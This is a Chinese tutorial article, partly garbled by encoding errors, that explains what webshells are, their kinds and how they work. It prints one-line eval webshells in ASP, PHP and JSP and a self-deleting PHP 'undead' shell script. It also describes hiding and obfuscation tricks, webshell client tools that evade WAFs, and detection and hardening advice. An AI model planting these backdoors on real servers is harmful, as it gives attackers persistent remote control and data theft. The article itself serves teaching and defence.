一、什么是WebShell？

顧名思義，“web”的含義是顯然需要服務(wù)器開放WEB服務(wù)，“shell”的含義是取得對(duì)服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為入侵者通過網(wǎng)站端口對(duì)網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限。由于webshell其大多是以動(dòng)態(tài)腳本的形式出現(xiàn)，也有人稱之為網(wǎng)站的后門工具。

Webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種代碼執(zhí)行環(huán)境，也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個(gè)網(wǎng)站后，通常會(huì)將asp或php后門文件與網(wǎng)站目錄下正常的網(wǎng)頁文件混在一起，然后就可以使用瀏覽器來訪問asp或者php后門，得到一個(gè)命令執(zhí)行環(huán)境，以達(dá)到控制網(wǎng)站服務(wù)器的目的。

利用Webshell可以在Web服務(wù)器上執(zhí)行系統(tǒng)命令、竊取數(shù)據(jù)、植入病毒、勒索核心數(shù)據(jù)、網(wǎng)站掛馬等惡意操作，危害極大。

二、WebShell的特點(diǎn)

黑客使用Webshell的第一步通常是將其上傳到可以訪問的服務(wù)器中，例如利用用戶CMS系統(tǒng)的第三方插件中的漏洞上傳一個(gè)簡(jiǎn)單的php Webshell。當(dāng)然，Webshell類型和作用也不完全相同，一些簡(jiǎn)單的Webshell只起到連接外界的作用，允許黑客插入更加精準(zhǔn)的惡意腳本，執(zhí)行他們所需要的指令；

另外一些則可能更加復(fù)雜，帶有數(shù)據(jù)庫(kù)或文件瀏覽器，讓黑客能夠從數(shù)千英里之外的地方查看入侵系統(tǒng)的代碼和數(shù)據(jù)。無論何種設(shè)計(jì)，Webshell都極其危險(xiǎn)，是網(wǎng)絡(luò)罪犯和高級(jí)持續(xù)威脅的常用工具。

Webshell常見的攻擊特點(diǎn)主要有以下幾點(diǎn)：

1、持久化遠(yuǎn)程訪問

Webshell腳本通常會(huì)包含后門，黑客上傳Webshell之后，就可以充分利用Webshell的后門實(shí)現(xiàn)遠(yuǎn)程訪問并控制服務(wù)器，從而達(dá)到長(zhǎng)期控制網(wǎng)站服務(wù)器的目的。此外，在上傳完Webshell之后，黑客會(huì)選擇自己修復(fù)漏洞，以確保沒有其他人會(huì)利用該漏洞。通過這種方式，黑客就可以一種低調(diào)的姿態(tài)，避免與管理員進(jìn)行任何交互，同時(shí)仍然獲得相同的結(jié)果。

2、提權(quán)

在服務(wù)器沒有配置錯(cuò)誤的情況下，Webshell將在WEB服務(wù)器的用戶權(quán)限下運(yùn)行，而用戶權(quán)限是有限的。通過Webshell，黑客可以利用系統(tǒng)上的本地漏洞來實(shí)現(xiàn)權(quán)限提升，從而獲得Root權(quán)限，這樣黑客基本上可以在系統(tǒng)上做任何事情，包括安裝軟件、更改權(quán)限、添加和刪除用戶、竊取密碼、閱讀電子郵件等等。

3、隱蔽性極強(qiáng)

Webshell可以嵌套在正常網(wǎng)頁中運(yùn)行，且不容易被查殺。它還可以穿越服務(wù)器防火墻，由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交互的數(shù)據(jù)都是通過80端口傳遞，因此不會(huì)被防火墻攔截，在沒有記錄流量的情況下，Webshell使用POST包發(fā)送，也不會(huì)被記錄在系統(tǒng)日志中，只會(huì)在Web日志中記錄一些數(shù)據(jù)提交的記錄。

三、WebShell的分類

Webshell根據(jù)腳本可以分為PHP腳本木馬，ASP腳本木馬，JSP腳本木馬，也有基于.NET的腳本木馬。根據(jù)時(shí)代和技術(shù)的變遷，也有用python和lua編寫的腳本木馬。

常用有如下幾種：

1、大馬

?體積大，功能全

?會(huì)調(diào)用系統(tǒng)關(guān)鍵函數(shù)

?以代碼加密進(jìn)行隱藏

2、小馬

?體積小，功能少

?一般只有一個(gè)上傳功能，用于上傳大馬

3、一句話木馬

?代碼短?使用場(chǎng)景大，可單獨(dú)生成文件，可插入文件

?安全性高，隱藏性強(qiáng)，可變形免殺

?框架不變，數(shù)據(jù)執(zhí)行，數(shù)據(jù)傳遞

4、打包馬

?主要用于打包網(wǎng)站源碼

5、拖庫(kù)馬

?主要用于導(dǎo)出網(wǎng)站數(shù)據(jù)庫(kù)

6、內(nèi)存馬

?無文件落地

?極難檢測(cè)和發(fā)現(xiàn)

?難以清除

四、WebShell的原理

Webshell的惡意性表現(xiàn)在它的實(shí)現(xiàn)功能上，是一段帶有惡意目的的正常腳本代碼。

不同腳本類型的一句話木馬：

<%eval request(“cmd”)%>

<%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>

<?php @eval($_POST[‘cmd’]); ?>

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

這里僅對(duì)PHP的一句話木馬進(jìn)行分析，核心步驟如下：

1、數(shù)據(jù)的傳遞

?$_GET、$_POST、$_COOKIES、$_REQUEST、$_FILE、$_SERVER

?從遠(yuǎn)程遠(yuǎn)程URL中獲取數(shù)據(jù): file_get_contents、curl、svn_checkout...（將需要執(zhí)行的指令數(shù)據(jù)放在遠(yuǎn)程URL中，通過URL_INCLUDE來讀取）

?從本地磁盤文件中獲取數(shù)據(jù): file、file_get_contents...（將需要執(zhí)行的指令數(shù)據(jù)放在本地磁盤文件中，利用IO函數(shù)來讀?。?/p>

?從數(shù)據(jù)庫(kù)中讀取（將需要執(zhí)行的指令放在數(shù)據(jù)庫(kù)中，利用數(shù)據(jù)庫(kù)函數(shù)來讀?。?/p>

?從圖片頭部中獲取: exif_read_data...（將需要執(zhí)行的指令數(shù)據(jù)放在圖片頭部中，利用圖片操作函數(shù)來讀取）

2、代碼執(zhí)行

將用戶傳輸?shù)臄?shù)據(jù)進(jìn)行執(zhí)行

?代碼執(zhí)行函數(shù)：eval、assert、system…執(zhí)行（這是最普通、標(biāo)準(zhǔn)的代碼執(zhí)行）

?LFI：include、require...（利用瀏覽器的偽協(xié)議將文件包含轉(zhuǎn)化為代碼執(zhí)行）

?動(dòng)態(tài)函數(shù)執(zhí)行：（$()...PHP的動(dòng)態(tài)函數(shù)特性）

?Curly Syntax：（${${…}}...這種思路可以把變量賦值的漏洞轉(zhuǎn)化為代碼執(zhí)行的機(jī)會(huì)）

3、內(nèi)存馬

有關(guān)Java內(nèi)存馬以及JspWebShell的免殺我打算之后在Java代碼審計(jì)中詳細(xì)講解，這里就全部以PHP的腳本木馬為主。

何為內(nèi)存馬？

內(nèi)存馬是無文件攻擊的一種常用手段，隨著攻防演練熱度越來越高：攻防雙方的博弈，流量分析、EDR等專業(yè)安全設(shè)備被藍(lán)方廣泛使用，傳統(tǒng)的文件上傳的webshll或以文件形式駐留的后門越來越容易被檢測(cè)到，內(nèi)存馬使用越來越多。

Webshell內(nèi)存馬，是在內(nèi)存中寫入惡意后門和木馬并執(zhí)行，達(dá)到遠(yuǎn)程控制Web服務(wù)器的一類內(nèi)存馬，其瞄準(zhǔn)了企業(yè)的對(duì)外窗口：網(wǎng)站、應(yīng)用。

但傳統(tǒng)的Webshell都是基于文件類型的，黑客可以利用上傳工具或網(wǎng)站漏洞植入木馬，區(qū)別在于Webshell內(nèi)存馬是無文件馬，利用中間件的進(jìn)程執(zhí)行某些惡意代碼，不會(huì)有文件落地，給檢測(cè)帶來巨大難度。

4、PHP內(nèi)存馬

PHP內(nèi)存馬，也叫做PHP不死馬、不死僵尸，在線下AWD中是常用手段之一。在蟻劍中也有專門的插件可以一鍵注入內(nèi)存馬。原理也很簡(jiǎn)單，相對(duì)于Java可以直接把整個(gè)shell寫入內(nèi)存，php內(nèi)存馬的實(shí)現(xiàn)則是將一個(gè)木馬反復(fù)寫入，達(dá)到無法刪除的目的。

<?php
    ignore_user_abort(true); //設(shè)置客戶端斷開連接時(shí)是否中斷腳本的執(zhí)行
    set_time_limit(0); //設(shè)置腳本最大執(zhí)行時(shí)間linux下可能不大好用
    unlink(__FILE__); //刪除自身
    $file = 'shell.php';
    $code = '<?php @eval($_POST["cmd"]);?>';
    while (1) {
        file_put_contents($file, $code);//惡意代碼
        usleep(5000); //延遲執(zhí)行可有可無
    }
?>

本質(zhì)上原理是不變大，執(zhí)行死循環(huán)，然后刪除自身。但實(shí)際上這樣做還是會(huì)有文件落地，只是管理員刪不掉、刪不完罷了。我們也可以用利用fastcgi對(duì)php攻擊執(zhí)行命令，但這樣是否算一個(gè)駐留wenshell還有待爭(zhēng)議。

五、WebShell管理工具

1.中國(guó)菜刀（Chopper）

中國(guó)菜刀是一款專業(yè)的網(wǎng)站管理軟件，用途廣泛，使用方便，小巧實(shí)用。只要支持動(dòng)態(tài)腳本的網(wǎng)站，都可以用中國(guó)菜刀來進(jìn)行管理！

在非簡(jiǎn)體中文環(huán)境下使用，自動(dòng)切換到英文界面。UNICODE方式編譯，支持多國(guó)語言輸入顯示。

2.蟻劍（AntSword）

中國(guó)蟻劍是一款開源的跨平臺(tái)網(wǎng)站管理工具，它主要面向于合法授權(quán)的滲透測(cè)試安全人員以及進(jìn)行常規(guī)操作的網(wǎng)站管理員。任何人不得將其用于非法用途以及盈利等目的，否則后果自行承擔(dān)！

使用編/解碼器進(jìn)行流量混淆可繞過WAF，并且有多款實(shí)用插件。

項(xiàng)目地址：https://github.com/AntSwordProject/antSword

3.冰蝎(Behinder)

冰蝎是一款基于Java開發(fā)的動(dòng)態(tài)二進(jìn)制加密通信流量的新型Webshell客戶端，由于它的通信流量被加密，使用傳統(tǒng)的WAF、IDS等設(shè)備難以檢測(cè)，目前在HVV中使用較多的一款工具。

項(xiàng)目地址：http://github.com/rebeyond/Behinder

4.哥斯拉(Godzilla)

哥斯拉是一款繼冰蝎之后又一款于Java開發(fā)的加密通信流量的新型Webshell客戶端，內(nèi)置了3種有效載荷以及6種加密器，6種支持腳本后綴，20個(gè)內(nèi)置插件，也是目前在HVV中使用較多的一款工具。

項(xiàng)目地址：https://github.com/BeichenDream/Godzilla

5.C刀(Cknife)

C刀是一款基于Java開發(fā)的完全基于配置文件的中國(guó)菜刀，跨平臺(tái)，腳本類型支持ASP、ASPX、PHP、JSP、JSPX、Customize

目前完成的功能有：文件管理、數(shù)據(jù)庫(kù)管理、模擬終端以及代理設(shè)置等。

項(xiàng)目地址：https://github.com/Chora10/Cknife

6.Web版菜刀（WebKnife）

WebKnife是陌小離練習(xí)ajax時(shí)候?qū)懙囊豢畎氤善稺eb版菜刀，目前完成的功能有：文件管理，虛擬終端，文件查看，圖片查看，一鍵掛黑！

項(xiàng)目地址：https://github.com/MoLeft/WebKnife

7.XISE

XISE是小駿用易語言開發(fā)的一款類似于中國(guó)菜刀的Webshell網(wǎng)站管理工具，早些年做黑帽SEO的基本人手一份，現(xiàn)在已經(jīng)停止更新，至于什么原因，大家都懂的?。?！

8.開山斧

開山斧是一款基于Python 2.7X + QT4開發(fā)的一款跨平臺(tái)菜刀 (Win/Linux/Mac)，體積比較大，剛出來時(shí)只用過一次，現(xiàn)在用的人應(yīng)該不多，也已經(jīng)停止更新了。

項(xiàng)目地址：https://github.com/pyqteval/evlal_win

9.K8飛刀

K8飛刀是K8哥哥開發(fā)的一款Webshell網(wǎng)站管理工具，不得不說他開發(fā)的安全工具都很強(qiáng)大且實(shí)用，只不過個(gè)人感覺略顯臃腫，對(duì)新人來說可能不是很友好，有興趣的可以自己去看一下。

項(xiàng)目地址：https://github.com/k8gege/K8tools

9.Weevely

Weevely是一款python編寫的生成和管理php webshell的安全測(cè)試工具，目前擁有30多個(gè)模塊：文件管理、命令執(zhí)行、數(shù)據(jù)庫(kù)管理、端口掃描等功能，部分模塊不支持在Windows環(huán)境下使用。

項(xiàng)目地址：https://github.com/epinna/weevely3

10.WeBaCoo

WeBaCoo是一款Perl語言編寫的Web后門工具，它的特別之處在于Web服務(wù)器和客戶端之間的通信載體是Cookie，這就意味著多數(shù)的殺毒軟件、網(wǎng)絡(luò)入侵檢測(cè)/防御系統(tǒng)、網(wǎng)絡(luò)防火墻和應(yīng)用程序防火墻都無法檢測(cè)到該后門的存在。當(dāng)然，這只是以前的介紹，現(xiàn)在基本都會(huì)被檢測(cè)了。

項(xiàng)目地址：https://github.com/anestisb/WeBaCoo

六、WebShell隱藏

1.隱藏到日志

例如，修改發(fā)送數(shù)據(jù)包的頭部，添加WebShell。 web服務(wù)器一般會(huì)保存訪問記錄到Web日志，若找到web日志，且放到可執(zhí)行目錄下，可能獲得shell。

2.隱藏到合法文件

例如，文件上傳漏洞中，將php代碼放到j(luò)pg文件中，可以使用@運(yùn)算符，以防發(fā)生任何錯(cuò)誤。

3.混淆

刪除空格、換行符等，導(dǎo)致代碼文件比較亂，使用編碼或加密來隱藏掉惡意函數(shù)名等。

七、WebShell檢測(cè)與防御

1.靜態(tài)檢測(cè)

在對(duì)日志文件進(jìn)行預(yù)處理后，對(duì)日志記錄進(jìn)行文本特征匹配、統(tǒng)計(jì)特征計(jì)算與文件關(guān)聯(lián)性分析，最后對(duì)檢測(cè)結(jié)果匯總，列出疑似的Webshell文件。

例如，網(wǎng)站目錄下某php文件訪問量過少，且來源ip固定。

2.動(dòng)態(tài)檢測(cè)

webshell傳到服務(wù)器了，黑客總要去執(zhí)行它吧，webshell執(zhí)行時(shí)刻表現(xiàn)出來的特征，我們稱為動(dòng)態(tài)特征。

例如，webshell如果執(zhí)行系統(tǒng)命令的話，會(huì)有進(jìn)程。

3.webshell掃描

 點(diǎn)擊執(zhí)行操作

webshell文件被刪除，但是%SystemDrive%目錄還存在。

八、如何防范Webshell 滲透？

從根本上解決動(dòng)態(tài)網(wǎng)頁腳本的安全問題，要做到防注入、防爆庫(kù)、防COOKIES欺騙、防跨站攻擊（xss）等等，務(wù)必配置好服務(wù)器FSO權(quán)限。最小的權(quán)限等于最大的安全。

最有效方法就是：可寫目錄不給執(zhí)行權(quán)限，有執(zhí)行權(quán)限的目錄不給寫權(quán)限。

具體的防范方法（以php為例子）：

1、建議用戶通過ftp來上傳、維護(hù)網(wǎng)頁，盡量不安裝php的上傳程序。

2、對(duì)php上傳程序的調(diào)用一定要進(jìn)行身份認(rèn)證，并只允許信任的人使用上傳程序。

3、php程序管理員的用戶名和密碼要有一定復(fù)雜性，不能過于簡(jiǎn)單，還要注意定期更換。

4、到正規(guī)網(wǎng)站下載程序，下載后要對(duì)數(shù)據(jù)庫(kù)名稱和存放路徑進(jìn)行修改，數(shù)據(jù)庫(kù)名稱要有一定復(fù)雜性。

5、要盡量保持程序是最新版本。

6、不要在網(wǎng)頁上加注后臺(tái)管理程序登陸頁面的鏈接。

7、為防止程序有未知漏洞，可以在維護(hù)后刪除后臺(tái)管理程序的登陸頁面，下次維護(hù)時(shí)再通過上傳即可。

8、要時(shí)常備份數(shù)據(jù)庫(kù)等重要文件。

9、日常要多維護(hù)，并注意空間中是否有來歷不明的php文件。

10、盡量關(guān)閉網(wǎng)站搜索功能，利用外部搜索工具，以防爆出數(shù)據(jù)。

11、利用白名單上傳文件，不在白名單內(nèi)的一律禁止上傳，上傳目錄權(quán)限遵循最小權(quán)限原則。

12、使用防篡改系統(tǒng)工具，或者使用軟件監(jiān)控網(wǎng)站目錄文件的操作日志，一發(fā)現(xiàn)異常馬上處理。

總結(jié)：

攻擊層面還應(yīng)考慮如何繞過系統(tǒng)上傳webshell，如何隱藏webshell免查殺，防御方面應(yīng)該考慮如何避免webshell被上傳，如何查殺webshell。

本文鏈接：http://m.hkass.cn/article/1237.html